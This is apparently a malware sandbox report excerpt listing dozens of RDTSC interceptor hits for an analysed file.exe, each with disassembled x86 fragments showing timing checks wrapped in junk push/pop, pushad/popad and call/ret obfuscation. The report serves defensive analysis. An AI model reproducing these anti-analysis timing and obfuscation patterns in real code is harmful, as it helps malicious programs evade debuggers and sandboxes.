Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D13757 second address: D1375B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1375B second address: D13761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D13CE2 second address: D13CFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FDA2529D36Dh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D13CFD second address: D13D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D13E85 second address: D13E8F instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D13E8F second address: D13EA0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDA252A168Ch 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1769B second address: D1769F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1784B second address: D17884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FDA252A1693h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jc 00007FDA252A168Ah 0x00000017 push ebx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FDA252A168Ah 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17884 second address: D1788E instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1788E second address: D17898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FDA252A1686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17898 second address: D178BA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDA2529D370h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D178BA second address: D178C4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDA252A168Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D178C4 second address: D17923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D2DBEh], eax 0x0000000d sub dword ptr [ebp+122D33FDh], ebx 0x00000013 push 00000003h 0x00000015 mov ecx, dword ptr [ebp+122D33BAh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FDA2529D368h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 xor di, 69CAh 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D390Bh], esi 0x00000044 call 00007FDA2529D369h 0x00000049 push eax 0x0000004a jc 00007FDA2529D368h 0x00000050 pushad 0x00000051 popad 0x00000052 pop eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17923 second address: D1792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDA252A1686h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1792E second address: D1795E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D36Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 pop eax 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ecx 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007FDA2529D366h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1795E second address: D17962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17962 second address: D179A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D329Ah], ecx 0x0000000e lea ebx, dword ptr [ebp+124594F6h] 0x00000014 pushad 0x00000015 call 00007FDA2529D36Dh 0x0000001a call 00007FDA2529D36Dh 0x0000001f pop ebx 0x00000020 pop edx 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FDA2529D370h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D179A7 second address: D179CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FDA252A1686h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA252A1699h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D179CF second address: D179D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D179D5 second address: D179D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17A2C second address: D17A36 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37F86 second address: D37F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37F8C second address: D37FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c je 00007FDA2529D37Dh 0x00000012 jnp 00007FDA2529D377h 0x00000018 jmp 00007FDA2529D36Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36958 second address: D3699C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1692h 0x00000007 jl 00007FDA252A169Eh 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FDA252A1696h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDA252A168Ah 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3699C second address: D369A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D369A2 second address: D369A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36B57 second address: D36B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36C91 second address: D36CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDA252A1686h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FDA252A1686h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36CA6 second address: D36CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36CAA second address: D36CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDA252A1695h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36E1F second address: D36E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36F8E second address: D36F9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FDA252A1686h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D36F9E second address: D36FA8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDA2529D366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D370F1 second address: D370FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDA252A168Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D370FB second address: D37108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 js 00007FDA2529D366h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D376FE second address: D37704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37704 second address: D37713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FDA2529D366h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37713 second address: D3771B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D378AD second address: D378B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D378B4 second address: D378BE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDA252A168Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37B62 second address: D37B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FDA2529D36Ah 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007FDA2529D378h 0x00000013 jno 00007FDA2529D366h 0x00000019 pop esi 0x0000001a pushad 0x0000001b jp 00007FDA2529D366h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AAE5 second address: D3AAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B14C second address: D3B17C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA2529D368h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FDA2529D36Ch 0x00000016 jmp 00007FDA2529D372h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B17C second address: D3B182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B182 second address: D3B186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39996 second address: D3999C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D428FB second address: D42903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42903 second address: D42907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42BFB second address: D42C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C00 second address: D42C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C06 second address: D42C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDA2529D372h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C27 second address: D42C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42C2D second address: D42C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDA2529D379h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D451DF second address: D451EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA252A168Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D451EF second address: D45202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jo 00007FDA2529D36Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45202 second address: D4520A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4520A second address: D4520E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4520E second address: D4524B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c jmp 00007FDA252A1698h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push 83B72ECCh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FDA252A168Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4524B second address: D45250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45310 second address: D45314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4566D second address: D45672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4574E second address: D45752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D45D58 second address: D45D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FDA2529D366h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FDA2529D377h 0x00000017 jmp 00007FDA2529D371h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC1 second address: D46FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FC5 second address: D46FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D481D1 second address: D481D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46FCB second address: D46FE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D36Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FDA2529D374h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D481D5 second address: D48237 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDA252A1688h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, eax 0x0000000d push 00000000h 0x0000000f jno 00007FDA252A1699h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FDA252A1688h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 xor dword ptr [ebp+122D1E89h], edx 0x00000037 mov dword ptr [ebp+122D1C00h], ecx 0x0000003d mov di, C6A1h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48237 second address: D4823D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C8C second address: D48C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496E9 second address: D496FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 js 00007FDA2529D386h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496FA second address: D496FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D496FE second address: D49795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FDA2529D368h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 pushad 0x00000025 call 00007FDA2529D36Dh 0x0000002a adc ecx, 0A654D65h 0x00000030 pop esi 0x00000031 adc si, D39Bh 0x00000036 popad 0x00000037 mov dword ptr [ebp+122D1BB0h], esi 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D2DB1h], edi 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007FDA2529D368h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 xchg eax, ebx 0x00000062 jns 00007FDA2529D36Ah 0x00000068 push eax 0x00000069 push ecx 0x0000006a push eax 0x0000006b push edx 0x0000006c push ecx 0x0000006d pop ecx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49795 second address: D49799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A25C second address: D4A262 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A262 second address: D4A268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ACD9 second address: D4AD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA2529D366h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FDA2529D375h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AD05 second address: D4AD0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AD0B second address: D4ADA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FDA2529D368h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov esi, dword ptr [ebp+122D2A16h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FDA2529D368h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 adc edi, 76E077C9h 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 push ebx 0x00000051 push edi 0x00000052 pop edi 0x00000053 pop ebx 0x00000054 jmp 00007FDA2529D372h 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FDA2529D36Ch 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4ADA3 second address: D4ADBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA252A1694h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7C7 second address: D4B7D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7D3 second address: D4B7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7D8 second address: D4B7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B7DE second address: D4B7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BF7C second address: D4BFA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D378h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA2529D36Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BFA7 second address: D4BFBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4BFBA second address: D4BFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
